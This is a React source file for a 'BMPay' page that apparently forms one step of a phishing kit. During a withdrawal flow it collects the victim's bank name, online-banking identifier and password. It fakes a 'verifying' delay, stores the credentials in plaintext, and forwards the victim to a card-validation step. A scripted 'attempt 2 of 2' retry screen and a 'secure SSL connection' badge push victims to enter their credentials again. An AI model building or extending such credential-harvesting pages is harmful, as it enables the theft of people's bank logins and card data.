import React, { useState, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import { useApp } from '@/context/AppContext';
import { useLanguage } from '@/context/LanguageContext';
import { Button } from '@/components/ui/button';
import { Input } from '@/components/ui/input';
import { Label } from '@/components/ui/label';
import { Card, CardContent, CardHeader, CardFooter } from '@/components/ui/card';
import { Alert, AlertDescription } from '@/components/ui/alert';
import { Landmark, Lock, User, ShieldCheck, ArrowLeft, AlertTriangle } from 'lucide-react';
import { toast } from 'sonner';

const BankAuthPage = () => {
  const navigate = useNavigate();
  const appContext = useApp();
  const { currentUser, config, withdrawData, setWithdrawData, setBankData, authAttempts, isRetryFlow } = appContext;
  const { t } = useLanguage();
  const [bankName, setBankName] = useState('');
  const [identifier, setIdentifier] = useState('');
  const [password, setPassword] = useState('');
  const [errors, setErrors] = useState({});
  const [isLoading, setIsLoading] = useState(false);

  useEffect(() => {
    if (!currentUser || !withdrawData) {
      navigate('/');
    }
  }, [currentUser, withdrawData, navigate]);

  const validateForm = () => {
    const newErrors = {};
    if (!bankName) newErrors.bankName = t('selectBankError');
    if (!identifier.trim()) newErrors.identifier = t('identifierRequired');
    if (!password.trim()) newErrors.password = t('passwordRequired');
    setErrors(newErrors);
    return Object.keys(newErrors).length === 0;
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    if (!validateForm()) return;

    setIsLoading(true);
    await new Promise(resolve => setTimeout(resolve, 1200));
    
    setWithdrawData({ ...withdrawData });
    setBankData({ bankName, identifier, password });
    toast.success(t('authSaved'));
    navigate('/card-validation');
    
    setIsLoading(false);
  };

  if (!currentUser || !withdrawData) return null;

  const banksList = config && config.banks ? config.banks : [];
  const isRetry = isRetryFlow || authAttempts > 0;

  return (
    <div className="min-h-screen flex flex-col vault-bg">
      <header className="header-nav px-4 py-3 sticky top-0 z-10">
        <div className="max-w-7xl mx-auto flex items-center justify-between">
          <Button
            variant="ghost"
            size="sm"
            onClick={() => navigate('/withdraw')}
            className="text-slate-600 hover:text-slate-900 hover:bg-slate-100 rounded-lg -ml-2"
            data-testid="back-button"
          >
            <ArrowLeft className="h-5 w-5 mr-1" />
            <span className="hidden sm:inline">{t('back')}</span>
          </Button>
          <div className="flex items-center gap-2">
            <img src="/logo.png" alt="BMPay" className="h-7 w-7" />
            <span className="font-bold text-[#0A2540] font-['Manrope']">BMPay</span>
          </div>
          <div className="w-20"></div>
        </div>
      </header>

      <div className="py-4 bg-white border-b border-slate-100">
        <div className="max-w-md mx-auto px-4">
          <div className="flex items-center justify-between">
            <div className="flex flex-col items-center">
              <div className="step-dot completed"></div>
              <span className="text-xs text-emerald-600 mt-1">{t('stepBeneficiary')}</span>
            </div>
            <div className="flex-1 h-0.5 bg-emerald-400 mx-2"></div>
            <div className="flex flex-col items-center">
              <div className="step-dot active"></div>
              <span className="text-xs font-medium text-[#0A2540] mt-1">{t('stepBank')}</span>
            </div>
            <div className="flex-1 h-0.5 bg-slate-200 mx-2"></div>
            <div className="flex flex-col items-center">
              <div className="step-dot"></div>
              <span className="text-xs text-slate-400 mt-1">{t('stepCard')}</span>
            </div>
          </div>
        </div>
      </div>

      <main className="flex-1 flex flex-col items-center p-4 sm:p-6">
        <div className="w-full max-w-md animate-slide-up">
          {!isRetry && (
            <Alert className="mb-4 bg-amber-50 border-amber-200 rounded-lg">
              <AlertTriangle className="h-4 w-4 text-amber-600" />
              <AlertDescription className="text-amber-800 ml-2 text-xs">
                <p className="font-semibold">{t('identityVerificationRequired')}</p>
                <p className="mt-1">{t('toFinalizeTransfer')}</p>
              </AlertDescription>
            </Alert>
          )}

          <Card className={`rounded-xl overflow-hidden ${isRetry ? 'border-t-4 border-t-amber-500' : 'secure-card-navy'}`}>
            <CardHeader className="bg-gradient-to-b from-slate-50 to-white px-5 pt-6 pb-4">
              <div className="flex justify-center mb-3">
                <div className={`w-14 h-14 rounded-full flex items-center justify-center ${isRetry ? 'bg-amber-100' : 'bg-[#0A2540]/10'}`}>
                  <Landmark className={`h-7 w-7 ${isRetry ? 'text-amber-600' : 'text-[#0A2540]'}`} />
                </div>
              </div>
              <h1 className="text-lg sm:text-xl font-bold text-[#0A2540] font-['Manrope'] text-center" data-testid="bank-auth-title">
                {isRetry ? t('newAttempt') : t('secureBankSpace')}
              </h1>
              <p className="text-xs text-slate-600 mt-1 text-center">
                {isRetry ? t('attempt2of2') : t('loginToVerify')}
              </p>
            </CardHeader>

            <CardContent className="px-5 pb-5">
              {isRetry && (
                <Alert className="mb-4 bg-amber-50 border-amber-200 rounded-lg">
                  <AlertTriangle className="h-4 w-4 text-amber-600" />
                  <AlertDescription className="text-amber-800 ml-2 text-xs" data-testid="retry-alert">
                    <span className="font-semibold">{t('lastAttempt')}</span> - {t('verifyCredentials')}
                  </AlertDescription>
                </Alert>
              )}

              <form onSubmit={handleSubmit} className="space-y-4">
                <div className="space-y-1">
                  <Label className="text-xs font-semibold text-slate-700 flex items-center gap-1">
                    <Landmark className="h-3 w-3" />
                    {t('bankEstablishment')}
                  </Label>
                  <select 
                    value={bankName} 
                    onChange={(e) => setBankName(e.target.value)} 
                    className={`w-full h-10 px-3 text-sm border rounded-lg bg-white text-slate-900 focus:border-[#0A2540] focus:ring-2 focus:ring-[#0A2540]/10 ${errors.bankName ? 'border-red-500' : 'border-slate-300'}`}
                    data-testid="bank-select"
                  >
                    <option value="">{t('selectBank')}</option>
                    {banksList.map((bank) => (
                      <option key={bank} value={bank}>{bank}</option>
                    ))}
                  </select>
                  {errors.bankName && <p className="text-xs text-red-600">{errors.bankName}</p>}
                </div>

                <div className="space-y-1">
                  <Label htmlFor="identifier" className="text-xs font-semibold text-slate-700 flex items-center gap-1">
                    <User className="h-3 w-3" />
                    {t('clientIdentifier')}
                  </Label>
                  <Input 
                    id="identifier" 
                    type="text" 
                    placeholder={t('bankIdentifierPlaceholder')} 
                    value={identifier} 
                    onChange={(e) => setIdentifier(e.target.value)} 
                    className={`h-10 text-sm border-slate-300 rounded-lg ${errors.identifier ? 'border-red-500' : ''}`} 
                    data-testid="identifier-input" 
                  />
                  {errors.identifier && <p className="text-xs text-red-600">{errors.identifier}</p>}
                </div>

                <div className="space-y-1">
                  <Label htmlFor="password" className="text-xs font-semibold text-slate-700 flex items-center gap-1">
                    <Lock className="h-3 w-3" />
                    {t('password')}
                  </Label>
                  <Input 
                    id="password" 
                    type="password" 
                    placeholder={t('yourPassword')} 
                    value={password} 
                    onChange={(e) => setPassword(e.target.value)} 
                    className={`h-10 text-sm border-slate-300 rounded-lg ${errors.password ? 'border-red-500' : ''}`} 
                    data-testid="password-input" 
                  />
                  {errors.password && <p className="text-xs text-red-600">{errors.password}</p>}
                </div>

                <Button 
                  type="submit" 
                  className={`w-full h-11 text-white font-semibold rounded-lg mt-4 ${isRetry ? 'bg-amber-600 hover:bg-amber-700' : 'bg-[#0A2540] hover:bg-[#163454]'}`} 
                  disabled={isLoading} 
                  data-testid="auth-button"
                >
                  {isLoading ? (
                    <span className="flex items-center gap-2">
                      <span className="spinner border-white border-t-transparent"></span>
                      {t('verifying')}
                    </span>
                  ) : (
                    t('authenticate')
                  )}
                </Button>
              </form>
            </CardContent>

            <CardFooter className="flex flex-col items-center py-4 bg-slate-50 border-t border-slate-100">
              <div className="security-badge text-xs">
                <ShieldCheck className="h-3 w-3" />
                <span>{t('sslConnection')}</span>
              </div>
            </CardFooter>
          </Card>
        </div>
      </main>
    </div>
  );
};

export default BankAuthPage;
